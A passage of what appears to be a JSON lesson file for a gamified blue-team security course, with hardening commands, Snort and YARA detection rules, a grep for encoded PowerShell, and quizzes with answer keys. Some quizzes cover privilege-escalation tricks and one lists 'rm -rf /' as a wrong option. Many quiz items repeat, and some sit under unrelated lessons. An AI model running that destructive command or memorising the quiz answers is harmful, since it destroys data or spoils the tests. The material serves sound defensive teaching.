Center.","sections":[{"type":"text","content":"Security Operations Center."},{"type":"code","lang":"bash","content":"# T1: Triage  T2: Investigation  T3: Hunting"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Tier 1 SOC analyst does?","opts":["Write exploits","Triage alerts","Develop policies","Manage firewalls"],"ans":1},{"type":"quiz","q":"The goal of threat hunting is...","opts":["Respond to alerts","Proactively find threats that evaded detection","Install patches","Write policies"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One strong firewall","Multiple overlapping security layers","Deep packet inspection only","Encrypting everything"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"threat-hunt","cat":"Defense & Blue Team","title":"Threat Hunting","diff":2,"xp":150,"intro":"Proactive threat search.","sections":[{"type":"text","content":"Proactive threat search."},{"type":"code","lang":"bash","content":"grep -r 'powershell.*-enc' /var/log/\n# Search for beaconing, unusual parent-child"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Hunting driven by?","opts":["Alerts","Hypotheses about attacker behavior","Vuln scans","Compliance"],"ans":1},{"type":"quiz","q":"A false positive in IDS means...","opts":["A real attack was detected","Normal traffic was flagged as an attack","An attack was missed","The IDS crashed"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum access needed for the job","Maximum access","Read-only access"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"snort-rules","cat":"Defense & Blue Team","title":"Snort/Suricata Rules","diff":2,"xp":150,"intro":"IDS detection rules.","sections":[{"type":"text","content":"IDS detection rules."},{"type":"code","lang":"bash","content":"alert tcp $EXTERNAL any -> $HOME 80 (\n  msg:\"SQLi attempt\";\n  content:\"UNION SELECT\"; nocase;\n  sid:1000001;)"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Rule message keyword?","opts":["content","msg","sid","alert"],"ans":1},{"type":"quiz","q":"SIEM stands for...","opts":["Security Information and Event Management","System Integration and Error Monitoring","Secure Internet Email Manager","Server Infrastructure Event Module"],"ans":0},{"type":"quiz","q":"The goal of threat hunting is...","opts":["Respond to alerts","Proactively find threats that evaded detection","Install patches","Write policies"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"yara-def","cat":"Defense & Blue Team","title":"YARA for Defense","diff":2,"xp":150,"intro":"Detect malware with YARA.","sections":[{"type":"text","content":"Detect malware with YARA."},{"type":"code","lang":"bash","content":"rule ransom {\n  strings: $r1=\"encrypted\" nocase\n  condition: $r1\n}\nyara -r rules.yar /suspicious/"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"YARA scans for?","opts":["Network","File patterns matching rules","Registry","Memory only"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One strong firewall","Multiple overlapping security layers","Deep packet inspection only","Encrypting everything"],"ans":1},{"type":"quiz","q":"A false positive in IDS means...","opts":["A real attack was detected","Normal traffic was flagged as an attack","An attack was missed","The IDS crashed"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"linux-hard","cat":"Defense & Blue Team","title":"Linux Hardening","diff":1,"xp":100,"intro":"Secure Linux systems.","sections":[{"type":"text","content":"Secure Linux systems."},{"type":"code","lang":"bash","content":"# PermitRootLogin no\nufw enable\nufw default deny incoming\nchmod 600 /etc/shadow"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Prevent root SSH?","opts":["DenyRoot","PermitRootLogin no","RootAccess off","DisableRoot"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum access needed for the job","Maximum access","Read-only access"],"ans":1},{"type":"quiz","q":"SIEM stands for...","opts":["Security Information and Event Management","System Integration and Error Monitoring","Secure Internet Email Manager","Server Infrastructure Event Module"],"ans":0},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"win-hard","cat":"Defense & Blue Team","title":"Windows Hardening","diff":1,"xp":100,"intro":"Secure Windows systems.","sections":[{"type":"text","content":"Secure Windows systems."},{"type":"code","lang":"bash","content":"Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol\nreg add ...Lsa /v RunAsPPL /d 1"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"LSASS protection?","opts":["BitLocker","Credential Guard","Defender","AppLocker"],"ans":1},{"type":"quiz","q":"The goal of threat hunting is...","opts":["Respond to alerts","Proactively find threats that evaded detection","Install patches","Write policies"],"ans":1},{"type":"quiz","q":"Defense in depth means...","opts":["One strong firewall","Multiple overlapping security layers","Deep packet inspection only","Encrypting everything"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"A DMZ is...","opts":["A type of encryption","A network zone between internal and external networks","A user group","A firewall brand"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"zero-trust","cat":"Defense & Blue Team","title":"Zero Trust","diff":1,"xp":75,"intro":"Never trust, always verify.","sections":[{"type":"text","content":"Never trust, always verify."},{"type":"code","lang":"bash","content":"# Verify explicitly\n# Least privilege\n# Assume breach"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Zero Trust core principle?","opts":["Trust but verify","Never trust, always verify","Perimeter","Default allow"],"ans":1},{"type":"quiz","q":"LinPEAS is a tool for...","opts":["Web scanning","Linux privilege escalation enumeration","Password cracking","Network sniffing"],"ans":1},{"type":"quiz","q":"The first command after getting a Linux shell should be...","opts":["rm -rf /","id && whoami","reboot","shutdown"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"edr","cat":"Defense & Blue Team","title":"EDR Basics","diff":1,"xp":100,"intro":"Endpoint Detection & Response.","sections":[{"type":"text","content":"Endpoint Detection & Response."},{"type":"code","lang":"bash","content":"# Process monitoring\n# File integrity\n# Behavioral analysis\n# Auto response"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"EDR monitors?","opts":["Only network","Endpoint: processes, files, connections, behavior","Only files","Only registry"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware samples","Exploitable Unix binaries","Password lists","CVE databases"],"ans":1},{"type":"quiz","q":"Windows equivalent of sudo is...","opts":["su","runas","chmod","admin"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for 